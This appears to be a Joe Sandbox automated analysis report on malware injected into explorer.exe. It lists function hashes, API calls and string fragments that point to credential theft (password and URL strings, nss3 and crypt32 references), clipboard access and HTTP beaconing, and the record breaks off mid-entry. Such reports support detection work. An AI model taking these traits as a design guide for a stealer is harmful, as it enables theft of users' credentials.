Instruction ID: 18fe18f1f5c9464844787e23fad378fdfc828b1ce4c67cfa3eee95dbba1cd309
Opcode Fuzzy Hash: 3b02f22b0ba6fe549e57460890749fd3d9f0f3b711e7bd31107f50e164a4bc50
Instruction Fuzzy Hash: A790027130141842D10065994805B470009A7E0351F61C016E4114754DC655C8517961

Uniqueness

Uniqueness Score: -1.00%

Function 01619A80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 181db97665a4a8cd1699787e688cc7819887fe5fd7a025837ed0a78659ad622a
Instruction ID: 53fade720c81d103af00333e7c765b5d8d5180976e98f5ddc8139aa4d7de9ebb
Opcode Fuzzy Hash: 181db97665a4a8cd1699787e688cc7819887fe5fd7a025837ed0a78659ad622a
Instruction Fuzzy Hash: 4890026130185442D14066994C05B0F4109A7E1252FA1C019E8146654CC95588556B61

Uniqueness

Uniqueness Score: -1.00%

Function 01619670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: a7d6ed56437cb92c43c3f4e2ff1015abbb96a24e925bd073b567eb30a7c17746
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0166FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0166FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0161CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01665720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01665720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0166fdda
0x0166fde2
0x0166fde5
0x0166fdec
0x0166fdfa
0x0166fdff
0x0166fe0a
0x0166fe0f
0x0166fe17
0x0166fe1e
0x0166fe19
0x0166fe19
0x0166fe19
0x0166fe20
0x0166fe21
0x0166fe22
0x0166fe25
0x0166fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0166FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0166FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0166FE01

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: a817d47b70bb8b15cdbffbf5e5e8a90a899dee31e463a75283b2f6452487adb3
Instruction ID: 2e3ec4db7711015e6602df52e7fca9c6e89a578a00b0091ec021b279de405d57
Opcode Fuzzy Hash: a817d47b70bb8b15cdbffbf5e5e8a90a899dee31e463a75283b2f6452487adb3
Instruction Fuzzy Hash: 38F0F632240602BFE6201A85DC02F33BF5FEB44B70F140318F6285A5D1DA62F83086F4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 3452, Parent PID: 240COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	18.1%
Total number of Nodes:	94
Total number of Limit Nodes:	8

Executed Functions

Function 0B7214F2 Relevance: 27.1, APIs: 5, Strings: 10, Instructions: 829
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0B7216B7
SleepEx.KERNEL32 ref: 0B721D5F
setsockopt.WS2_32 ref: 0B721E18
recv.WS2_32 ref: 0B721E44
recv.WS2_32 ref: 0B721E85

Strings

&wn=, xrefs: 0B721A1B
: cl, xrefs: 0B721921
tion, xrefs: 0B72191A
GET , xrefs: 0B721901
Co, xrefs: 0B72190C
&un=, xrefs: 0B721A7A
ose, xrefs: 0B721928
dat=, xrefs: 0B721893
nnec, xrefs: 0B721913
&br=, xrefs: 0B721A91

Memory Dump Source

Source File: 00000002.00000002.535902764.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b700000_explorer.jbxd

Similarity

API ID: recv$Sleepgetaddrinfosetsockopt
String ID: Co$&br=$&un=$&wn=$: cl$GET $dat=$nnec$ose$tion
API String ID: 878647675-2045366144
Opcode ID: 6d402d88823ea19e2df587a1f31de408e7f4c2e71253bbe99036a4e7cb3e0988
Instruction ID: 1afb9ca331ca1d7b7c781b1766c6f3a667d035683efa33a1ec11a60a853d915d
Opcode Fuzzy Hash: 6d402d88823ea19e2df587a1f31de408e7f4c2e71253bbe99036a4e7cb3e0988
Instruction Fuzzy Hash: 6C52B630618B588FDB69EF28D4897EEB3E1FB98300F50452EE49BD7652DF30A5458B41

Uniqueness

Uniqueness Score: -1.00%

Function 0B71AE22 Relevance: 1.6, APIs: 1, Instructions: 63
clipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenClipboard.USER32 ref: 0B71AE79

Memory Dump Source

Source File: 00000002.00000002.535902764.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b700000_explorer.jbxd

Similarity

API ID: ClipboardOpen
String ID:
API String ID: 2793039342-0
Opcode ID: 745962ed0e60235b729c147634a194dd063b9ef8d9cf040cceb8a21b140fd0ce
Instruction ID: c336305171944b07f8dfa01d6546a5b42f5e59c66e38b7d8991522c4001577b0
Opcode Fuzzy Hash: 745962ed0e60235b729c147634a194dd063b9ef8d9cf040cceb8a21b140fd0ce
Instruction Fuzzy Hash: 3F111230125E098FDB95EB2C80CE7B972E1FB48305F5809B9E41ACA1D6DB39C986C721

Uniqueness

Uniqueness Score: -1.00%

Function 0B71C472 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON(?,?,?,?,?,?,?,?,?,?,0B71CE9B), ref: 0B71C559

Strings

User, xrefs: 0B71C4C0
on.d, xrefs: 0B71C4B2
-Age, xrefs: 0B71C4C7
nt: , xrefs: 0B71C4CE
urlm, xrefs: 0B71C4AB

Memory Dump Source

Source File: 00000002.00000002.535902764.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b700000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: -Age$User$nt: $on.d$urlm
API String ID: 2681117516-1987325725
Opcode ID: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
Instruction ID: 508e785452728d4455fdd02915837e2fda673faf736e2042110ed0cd8c04708a
Opcode Fuzzy Hash: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
Instruction Fuzzy Hash: D031C231B14A5C8FCB05EFA8D8996EEB7E1FF68204F40422AE44ED7241DF74CA458B85

Uniqueness

Uniqueness Score: -1.00%

Function 0B71E082 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0B71E0EB

Strings

ect, xrefs: 0B71E0B1
conn, xrefs: 0B71E0AA

Memory Dump Source

Source File: 00000002.00000002.535902764.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b700000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 8e6ee82cb52f8b496bef60ee2b46d6d5c6c48f9218987fc6b92af486adba5c92
Instruction ID: 47f662fb4f7c96641887d49a50141ca262dc8e324e6e6ed9a2c118ea669a0557
Opcode Fuzzy Hash: 8e6ee82cb52f8b496bef60ee2b46d6d5c6c48f9218987fc6b92af486adba5c92
Instruction Fuzzy Hash: 3C014470518A0C8FCB84EF5CE088B547BE0FB58311F1546BEEA0DDB266C7B4C9818B95

Uniqueness

Uniqueness Score: -1.00%

Function 0B71DF66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0B71DFDB

Strings

WSAS, xrefs: 0B71DF93
tart, xrefs: 0B71DF9A

Memory Dump Source

Source File: 00000002.00000002.535902764.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b700000_explorer.jbxd

Similarity

API ID: Startup
String ID: WSAS$tart
API String ID: 724789610-2426239465
Opcode ID: 02406650e447c1fa7574cd5d84556fafe90163be47b457b1ed939eb2c599c675
Instruction ID: 5de6afea0ca0e130ac8c64173f23d074789c32e865471d1d8a3060d81e83276d
Opcode Fuzzy Hash: 02406650e447c1fa7574cd5d84556fafe90163be47b457b1ed939eb2c599c675
Instruction Fuzzy Hash: 9401B5714195048FCB40FF2CD08CBA9B7E0FF48355F2441E9E50ADF265D37486898766

Uniqueness

Uniqueness Score: -1.00%

Function 0B71DF72 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0B71DFDB

Strings

WSAS, xrefs: 0B71DF93
tart, xrefs: 0B71DF9A

Memory Dump Source

Source File: 00000002.00000002.535902764.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b700000_explorer.jbxd

Similarity

API ID: Startup
String ID: WSAS$tart
API String ID: 724789610-2426239465
Opcode ID: 1d4e0883fc1815f1912b8eb6048150167a70f4de8bbb156eb55e64cb1498d31e
Instruction ID: 12ad7fbaa1eeb2986beb1c1c1d07a37ba316395b7da52cb7cac44c87385f476e
Opcode Fuzzy Hash: 1d4e0883fc1815f1912b8eb6048150167a70f4de8bbb156eb55e64cb1498d31e
Instruction Fuzzy Hash: 28014F71508A088FCB44EF1DD08CB69BBE0FB58352F2581E9E50DDB265C7B4CA858B96

Uniqueness

Uniqueness Score: -1.00%

Function 0B719592 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0B7195E7

Strings

K;y&, xrefs: 0B71959F

Memory Dump Source

Source File: 00000002.00000002.535902764.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b700000_explorer.jbxd

Similarity

API ID: Sleep
String ID: K;y&
API String ID: 3472027048-1772047635
Opcode ID: fc810b80b542b816e3aa10076e14871e57494e43f3077854b27e7c2e52254b32
Instruction ID: baabf6458982895575b6628f8210d01b85f0d1d2b732a27049f4f426affc70ca
Opcode Fuzzy Hash: fc810b80b542b816e3aa10076e14871e57494e43f3077854b27e7c2e52254b32
Instruction Fuzzy Hash: 08216534504A4D8FCF54EF5C90E86A9B3A1FB94300F480A7EEA5FCB146DB749542C761

Uniqueness

Uniqueness Score: -1.00%

Function 0B71DFF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0B71E05D

Strings

send, xrefs: 0B71E01A

Memory Dump Source

Source File: 00000002.00000002.535902764.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b700000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: ad2f236766122beffabcd4b5b327f90ff22d20bd1524373b1c646cf2a1e7c532
Instruction ID: 0fba510ef34ad302d9f31e3df85dbcab103d9fab698d6aafee54d459c33d249c
Opcode Fuzzy Hash: ad2f236766122beffabcd4b5b327f90ff22d20bd1524373b1c646cf2a1e7c532
Instruction Fuzzy Hash: 6F015270518A0C8FCB94EF1CE048B1577E0FB58310F1545AEE94DCB266C774D8818B95

Uniqueness

Uniqueness Score: -1.00%

Function 0B71DED9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0B71DF4B

Strings

sock, xrefs: 0B71DF09

Memory Dump Source

Source File: 00000002.00000002.535902764.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b700000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 058ccfd56d24ceccc8dc1cea945d912323acad01842a6f445d4708d9ecda25b1
Instruction ID: 65ded3982b7aed0e532ffbe217ff79869ef8b94b48138d574ffad4ef7212ecfd
Opcode Fuzzy Hash: 058ccfd56d24ceccc8dc1cea945d912323acad01842a6f445d4708d9ecda25b1
Instruction Fuzzy Hash: 0C0192719186188FCB44EF1CD088B50BBE0FB58311F1A85BDEA4DDB262C3B4D985CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0B71DEE2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0B71DF4B

Strings

sock, xrefs: 0B71DF09

Memory Dump Source

Source File: 00000002.00000002.535902764.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b700000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: b5e9fd95fd77712679bc77e5ed075a02168c95ac9186b881f1bc913899d51f34
Instruction ID: bc615f1b41b77b3c24e07a6fe095c58d9b3c7bc973da8bf8ae208e2d842c99de
Opcode Fuzzy Hash: b5e9fd95fd77712679bc77e5ed075a02168c95ac9186b881f1bc913899d51f34
Instruction Fuzzy Hash: 660171719186088FCB44EF1CD088B14BBE0EB5C311F1681BDEA0DDB266C2B4C9858B95

Uniqueness

Uniqueness Score: -1.00%

Function 0B7204B2 Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0B720567

Memory Dump Source

Source File: 00000002.00000002.535902764.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b700000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: afa6d07527846fbb1122b3884d939f329e186663819791bdf139398d76f10f5b
Instruction ID: 6bb8957c1dd814640de769f77f30db656d7e0a2e93f015ff0f5be4f601f0d9f6
Opcode Fuzzy Hash: afa6d07527846fbb1122b3884d939f329e186663819791bdf139398d76f10f5b
Instruction Fuzzy Hash: 1B31D77051CB5CCFCB29DF08D8869EDB3E0FB95710F40065EF88A87216DA70A94286D2

Uniqueness

Uniqueness Score: -1.00%

Function 0B7204AB Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0B720567

Memory Dump Source

Source File: 00000002.00000002.535902764.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b700000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 6b769b170b1a8b9684fe2bf6667aca27b47b5c3d285ca0adb756b6e6030b14e7
Instruction ID: 99e10cf1bb82f8625acab59314ab1130efa9ee08638e43aa53c5cbbd5b95f995
Opcode Fuzzy Hash: 6b769b170b1a8b9684fe2bf6667aca27b47b5c3d285ca0adb756b6e6030b14e7
Instruction Fuzzy Hash: 20210A3121CB5C8FCB39DF0CD8869EC73D1F784710F40062EE4CA47256DA70A94286D6

Uniqueness

Uniqueness Score: -1.00%

Function 0B719692 Relevance: 1.5, APIs: 1, Instructions: 48
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0B7196E7

Memory Dump Source

Source File: 00000002.00000002.535902764.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b700000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9fb2356148101aa9420ae4aad7d72730ff3cfb8bd9b520b9a3e7d6278ce6f5f3
Instruction ID: 38a02def165c7be8bbe7c9126c9ed548aa60663d4fc44bce5d881db6cf6a097d
Opcode Fuzzy Hash: 9fb2356148101aa9420ae4aad7d72730ff3cfb8bd9b520b9a3e7d6278ce6f5f3
Instruction Fuzzy Hash: 55F08170618A084FCB88EF2CD49556AB3E0EB98200F440A3EA94AC7264EA35C5828752

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0EF1A290 Relevance: 11.7, Strings: 9, Instructions: 406COMMON

Download Yara Rule

Strings

.dll, xrefs: 0EF1A4AD
K;y&, xrefs: 0EF1A54F
ll, xrefs: 0EF1A491
kern, xrefs: 0EF1A4C0
el32, xrefs: 0EF1A4A5
user, xrefs: 0EF1A481
S, xrefs: 0EF1A5C7
M, xrefs: 0EF1A5D6
32.d, xrefs: 0EF1A489

Memory Dump Source

Source File: 00000002.00000002.537030158.000000000EF10000.00000040.00000001.00040000.00000000.sdmp, Offset: 0EF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ef10000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$K;y&$M$S$el32$kern$ll$user
API String ID: 0-2102913938
Opcode ID: c967ba98aa6818e9a7e8a5f096327c9b61f3f12a1156fda78f7e771b66dbc61a
Instruction ID: b2661fa395b73af9711d42d48d11695461ae48b8cce183bb2e2cc73f95fde0d1
Opcode Fuzzy Hash: c967ba98aa6818e9a7e8a5f096327c9b61f3f12a1156fda78f7e771b66dbc61a
Instruction Fuzzy Hash: 7DE14B70618E499FDB59EF38C4A4B9AF3E1FF98300F904A6E905EC7250DF34A9518B85

Uniqueness

Uniqueness Score: -1.00%

Function 0EF1E9A2 Relevance: 56.5, Strings: 45, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@@@@, xrefs: 0EF1EAB5
@@@@, xrefs: 0EF1EB79
@@@@, xrefs: 0EF1EB3A
@@@@, xrefs: 0EF1EABC
@@@@, xrefs: 0EF1EAF4
-./0, xrefs: 0EF1EA8B
@@@@, xrefs: 0EF1EACA
@@@@, xrefs: 0EF1EAAE
@@@@, xrefs: 0EF1EB17
)*+,, xrefs: 0EF1EA84
<=@@, xrefs: 0EF1EA22
@@@@, xrefs: 0EF1EADF
@@@@, xrefs: 0EF1EAD8
@@@@, xrefs: 0EF1EAE6
@@@@, xrefs: 0EF1EB4F
@@@@, xrefs: 0EF1EA99
@@@@, xrefs: 0EF1EAA0
@@@@, xrefs: 0EF1EB33
@@@?, xrefs: 0EF1EA0D
@@@@, xrefs: 0EF1EB1E
@@@@, xrefs: 0EF1EAFB
@@@@, xrefs: 0EF1EA29
@@@@, xrefs: 0EF1EB48
@@@@, xrefs: 0EF1EB72
@@@@, xrefs: 0EF1EB25
@@@@, xrefs: 0EF1EAA7
@@@@, xrefs: 0EF1EB56
%&'(, xrefs: 0EF1EA7D
@@@@, xrefs: 0EF1EB09
@@@@, xrefs: 0EF1EB10
4567, xrefs: 0EF1EA14
@@@@, xrefs: 0EF1EB02
@@@@, xrefs: 0EF1EAC3
@@@@, xrefs: 0EF1EB41
89:;, xrefs: 0EF1EA1B
@@@@, xrefs: 0EF1EB6B
@@@@, xrefs: 0EF1EB5D
@@@@, xrefs: 0EF1EB64
@@@@, xrefs: 0EF1EB2C
@@@@, xrefs: 0EF1EA61
?, xrefs: 0EF1EB8A
@@@@, xrefs: 0EF1EAD1
!"#$, xrefs: 0EF1EA76
@@@@, xrefs: 0EF1EAED
123@, xrefs: 0EF1EA92

Memory Dump Source

Source File: 00000002.00000002.537030158.000000000EF10000.00000040.00000001.00040000.00000000.sdmp, Offset: 0EF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ef10000_explorer.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
Instruction ID: 442449a566558943afd65d9862276b9742d6f4ec7289bc912411d94fa7db75dd
Opcode Fuzzy Hash: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
Instruction Fuzzy Hash: C1914EF04082988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0EF1BE72 Relevance: 9.0, Strings: 7, Instructions: 292COMMON

Download Yara Rule

Strings

name, xrefs: 0EF1BF42
Pass, xrefs: 0EF1BF27
word, xrefs: 0EF1BF2E
User, xrefs: 0EF1BF3B
2, xrefs: 0EF1BF71
L: , xrefs: 0EF1BEF6
UR, xrefs: 0EF1BEEF

Memory Dump Source

Source File: 00000002.00000002.537030158.000000000EF10000.00000040.00000001.00040000.00000000.sdmp, Offset: 0EF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ef10000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 75c8884196013b17c768361e1995a5fa7aa5762a9df6beb0c95d7ae7f7b5ba93
Instruction ID: a323d07a71a862806751026815101c24952095aa9532f46bb94c603516ffb1da
Opcode Fuzzy Hash: 75c8884196013b17c768361e1995a5fa7aa5762a9df6beb0c95d7ae7f7b5ba93
Instruction Fuzzy Hash: B991C170A1875C8BDB19EFA894647EEB7F2FF98300F404A2ED48AD7251EF7089458785

Uniqueness

Uniqueness Score: -1.00%

Function 0EF1AC02 Relevance: 7.7, Strings: 6, Instructions: 164COMMON

Download Yara Rule

Strings

b, xrefs: 0EF1ACB8
U, xrefs: 0EF1AD1E
n, xrefs: 0EF1AD33
d, xrefs: 0EF1ACC8
k, xrefs: 0EF1AD25
o, xrefs: 0EF1AD2C

Memory Dump Source

Source File: 00000002.00000002.537030158.000000000EF10000.00000040.00000001.00040000.00000000.sdmp, Offset: 0EF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ef10000_explorer.jbxd

Similarity

API ID:
String ID: U$b$d$k$n$o
API String ID: 0-1739295752
Opcode ID: c154e42e4e2377762541633edb31a1727a8ce2a1e2ea00f45db5444f4b9afd32
Instruction ID: dae4bdfc1037c11038c662b3d1e3fbad8c200ea71dc9386a46a87ecbf684d799
Opcode Fuzzy Hash: c154e42e4e2377762541633edb31a1727a8ce2a1e2ea00f45db5444f4b9afd32
Instruction Fuzzy Hash: 07516E30A14E1D9BDB08EFB4D8A47DEB3A1FF54301F40462AC41AD7251EF74AA558BC5

Uniqueness

Uniqueness Score: -1.00%

Function 0EF1C1D7 Relevance: 6.5, Strings: 5, Instructions: 207COMMON

Download Yara Rule

Strings

nss3, xrefs: 0EF1C2C8
cryp, xrefs: 0EF1C37C
.dll, xrefs: 0EF1C2CF
dll, xrefs: 0EF1C38A
t32., xrefs: 0EF1C383

Memory Dump Source

Source File: 00000002.00000002.537030158.000000000EF10000.00000040.00000001.00040000.00000000.sdmp, Offset: 0EF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ef10000_explorer.jbxd

Similarity

API ID:
String ID: .dll$cryp$dll$nss3$t32.
API String ID: 0-1478216402
Opcode ID: ed6325d0aff5055827ada73a612b01221855a1ddf8e9fb96a19483f3db3cb0e3
Instruction ID: 9d9f7e0d78cc2bbf891a37a86d6089be2a6a95d1ed9b21f982cda2442f151c0d
Opcode Fuzzy Hash: ed6325d0aff5055827ada73a612b01221855a1ddf8e9fb96a19483f3db3cb0e3
Instruction Fuzzy Hash: 96614C30A18B1D8FDB58EF68C4687EAB3E1FF58300F40866A984AC7254DB749954CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0EF1C1D2 Relevance: 6.5, Strings: 5, Instructions: 205COMMON

Download Yara Rule

Strings

nss3, xrefs: 0EF1C2C8
cryp, xrefs: 0EF1C37C
.dll, xrefs: 0EF1C2CF
dll, xrefs: 0EF1C38A
t32., xrefs: 0EF1C383

Memory Dump Source

Source File: 00000002.00000002.537030158.000000000EF10000.00000040.00000001.00040000.00000000.sdmp, Offset: 0EF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ef10000_explorer.jbxd

Similarity

API ID:
String ID: .dll$cryp$dll$nss3$t32.
API String ID: 0-1478216402
Opcode ID: a6cf1db3b2cf44addb77c6c3145e795bac18999a885706ce33a387fa702dbb64
Instruction ID: 7ff332a312e5d0bd3c91a1743e39c07df455635e43ebed7cd40e9d4aae541fa5
Opcode Fuzzy Hash: a6cf1db3b2cf44addb77c6c3145e795bac18999a885706ce33a387fa702dbb64
Instruction Fuzzy Hash: 74615C30A18B1D8FDB58EF68C4687EAB3E1FF58700F40866E944AC7254DB749954CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0EF197DE Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

2.dl, xrefs: 0EF19814
ole3, xrefs: 0EF1980D
dll, xrefs: 0EF1984E
l32., xrefs: 0EF19847
shel, xrefs: 0EF19840

Memory Dump Source

Source File: 00000002.00000002.537030158.000000000EF10000.00000040.00000001.00040000.00000000.sdmp, Offset: 0EF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ef10000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: 7312c44d1f0932142c55cb86490c7abd72f0b28439fd4d223315acbb67dd2d0a
Instruction ID: 4dd2c773bbf47568cb3c6181d7a3706a4afd9aefc8ea5558419c100dfeaf6aa3
Opcode Fuzzy Hash: 7312c44d1f0932142c55cb86490c7abd72f0b28439fd4d223315acbb67dd2d0a
Instruction Fuzzy Hash: A5617C70A14B4C8FDB54EFA4C4646EEB7F1FF58300F404A2E989AE7214EF7099419B86

Uniqueness

Uniqueness Score: -1.00%

Function 0EF197E2 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

2.dl, xrefs: 0EF19814
ole3, xrefs: 0EF1980D
dll, xrefs: 0EF1984E
l32., xrefs: 0EF19847
shel, xrefs: 0EF19840

Memory Dump Source

Source File: 00000002.00000002.537030158.000000000EF10000.00000040.00000001.00040000.00000000.sdmp, Offset: 0EF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ef10000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: 5a3df0026cc56c1644cef290c070b6d3b80a5a80f5bc76ad6d38711de2aa5d2b
Instruction ID: d31ced2a1e3cad62bc02aef253d61df01fd62d51256ccd0e46313d4d3965bf34
